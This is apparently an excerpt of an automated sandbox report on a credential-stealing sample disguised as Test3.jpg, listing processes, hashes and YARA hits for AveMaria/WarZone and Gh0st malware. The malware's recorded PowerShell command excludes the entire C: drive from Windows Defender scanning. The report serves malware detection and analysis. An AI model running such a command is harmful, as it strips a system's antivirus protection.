                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: AveMaria_WarZone, Description: unknown, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:14
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:339293 bytes
                                                                                                                                                                                                    MD5 hash:DD27F33FCD6F1FA4C67EE05D836795C2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: AveMaria_WarZone, Description: unknown, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: AveMaria_WarZone, Description: unknown, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:17
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                                                                                                                                                                    Imagebase:0x880000
                                                                                                                                                                                                    File size:430592 bytes
                                                                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:17
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:17
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:18
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:32
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:0x7ff732050000
                                                                                                                                                                                                    File size:30616 bytes
                                                                                                                                                                                                    MD5 hash:0600DF60EF88FD10663EC84709E5E245
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:34
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                    File size:182784 bytes
                                                                                                                                                                                                    MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:35
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\system32\drivers\tsusbhub.sys
                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                    File size:126464 bytes
                                                                                                                                                                                                    MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                    Reset < >